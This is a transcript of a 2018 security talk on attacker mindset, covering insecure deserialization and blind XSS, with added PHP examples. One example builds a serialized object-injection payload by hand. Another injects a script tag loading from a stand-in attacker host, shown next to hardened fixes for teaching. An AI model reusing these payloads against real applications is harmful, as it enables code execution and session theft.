Thinking Like an Attacker
Nick Le Mouton
February 05, 2018
Transcript
Thinking Like an Attacker (Hacking Your Own Organisation)
# whoami • Nick Le Mouton (@noodlesnz) • CTO Drugs.com
• Developer • Security • Operations
Googlebot
A2:2017 Broken Authentication
• Disconnect between security and developers • Security finds vulnerabilities
• Developers fix vulnerabilities • Security often doesn’t impart how they found the vulnerabilities in the first place
• Best position to attack an application • Shift mindset
• Logic and knowledge
Object Injection Example • A8:2017 Insecure Deserialization
GuzzleHttp\Cookie\CookieJar
Payload
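The slide names GuzzleHttp\Cookie\CookieJar as the class used in the object injection chain but does not show the mechanics. The following is an added example, not code from the talk or from Guzzle: LogFlusher is a hypothetical stand-in for any class whose magic method has a side effect, the base64 session cookie is an assumed transport, and the target path is chosen for the demo. It shows that an attacker needs only the class name and property names to build the payload, and that `allowed_classes => false` stops the gadget from ever being instantiated.

```php
<?php
// Added example (not from the talk). LogFlusher is a hypothetical gadget,
// standing in for a real library class such as the Guzzle cookie jar named
// on the slide; it is not Guzzle's code.
declare(strict_types=1);

final class LogFlusher
{
    public string $path = '/tmp/app.log';
    public string $buffer = '';

    // Any class with side effects in __destruct/__wakeup/__toString is a
    // candidate gadget: the side effect runs even though the application
    // never constructed the object on purpose.
    public function __destruct()
    {
        file_put_contents($this->path, $this->buffer, FILE_APPEND);
    }
}

// Vulnerable: the cookie is trusted as a PHP serialized string (assumed design).
function load_session_unsafe(string $cookie): mixed
{
    return unserialize(base64_decode($cookie, true) ?: '');
}

// Hardened: no application object can be rebuilt from untrusted input.
function load_session_safe(string $cookie): mixed
{
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return null;
    }
    // allowed_classes=false turns every object into __PHP_Incomplete_Class,
    // so no __destruct or __wakeup of an application class can fire.
    return @unserialize($raw, ['allowed_classes' => false]);
}

// Constructed payload: built by hand from the class and property names only,
// exactly as an attacker would, without ever loading the class.
function build_payload(string $path, string $content): string
{
    $serialized = sprintf(
        'O:10:"LogFlusher":2:{s:4:"path";s:%d:"%s";s:6:"buffer";s:%d:"%s";}',
        strlen($path), $path, strlen($content), $content
    );
    return base64_encode($serialized);
}

$target = sys_get_temp_dir() . '/deser-demo-' . getmypid() . '.txt';
$cookie = build_payload($target, "written by the gadget's __destruct\n");

$obj = load_session_unsafe($cookie);   // LogFlusher rebuilt, destructor pending
unset($obj);                            // refcount hits zero: file is written
echo file_exists($target) ? "unsafe: file written\n" : "unsafe: nothing written\n";
@unlink($target);

$obj = load_session_safe($cookie);
echo get_class($obj), "\n";             // __PHP_Incomplete_Class
unset($obj);                            // no destructor to run
echo file_exists($target) ? "safe: file written\n" : "safe: no side effect\n";
```

`allowed_classes` is a containment measure; the clean fix is to stop feeding untrusted bytes to `unserialize()` at all and use `json_decode()` (or a signed/encrypted session blob) instead, since `__PHP_Incomplete_Class` values still have to be handled somewhere downstream.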
Blind XSS • A7:2017 Cross-Site Scripting (XSS) • Security scan shows no XSS vulnerability
XSS Hunter
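Why a scanner reports no XSS while the payload still fires, and the output-time fix, as an added example that is not from the talk: the contact form, the admin page, and the callback host attacker-callback.example are all constructed for illustration. The public endpoint never echoes the input, so a scanner checking its own responses sees nothing; the injected script only runs when staff open the internal page, which is exactly the situation an out-of-band listener such as XSS Hunter is built to catch.

```php
<?php
// Added example (not from the talk). All names and hosts are placeholders.
declare(strict_types=1);

// Constructed submission: stored by the public form, rendered hours later
// inside an internal admin page that the scanner never requests.
const SUBMISSION = [
    'name'    => 'Jane <script src="https://attacker-callback.example/p.js"></script>',
    'message' => 'Hello "support" team & friends',
];

// What the scanner gets back from the public endpoint: a fixed page that
// does not reflect the input, so no reflection-based check can fire.
function public_form_response(array $submission): string
{
    return '<p>Thanks, your message was received.</p>';
}

// Vulnerable admin page: stored data interpolated straight into markup.
function admin_row_unsafe(array $submission): string
{
    return "<tr><td>{$submission['name']}</td><td>{$submission['message']}</td></tr>";
}

// Hardened: encode for the HTML text context at output time, with the
// charset stated so encoder and browser agree on byte boundaries.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function admin_row_safe(array $submission): string
{
    return '<tr><td>' . h($submission['name']) . '</td><td>'
        . h($submission['message']) . '</td></tr>';
}

// Check a test suite can keep: no live <script tag may survive rendering.
function contains_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

echo public_form_response(SUBMISSION), "\n";   // all the scanner ever sees
echo admin_row_unsafe(SUBMISSION), "\n";       // script tag reaches staff browsers
echo admin_row_safe(SUBMISSION), "\n";         // rendered as inert text
var_dump(contains_live_script(admin_row_unsafe(SUBMISSION)));  // bool(true)
var_dump(contains_live_script(admin_row_safe(SUBMISSION)));    // bool(false)
```

Encoding must match the context the value lands in (an attribute or a JavaScript string needs a different encoder than HTML text), and a `Content-Security-Policy` that does not allow scripts from arbitrary origins is the backstop for the place where encoding was forgotten.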
So How Can I Do That? • Offensive Security Courses
• Hack Yourself First by Troy Hunt (pluralsight.com) • https://infosec101.nz/
• Start hacking things, find out what works and what doesn’t • Damn Vulnerable Web Application (DVWA) • OWASP Juice Shop Project
CTFs • CTFLearn.com • Find upcoming online CTFs on ctftime.org
• Read write-ups at ctftime.org/writeups
Thank You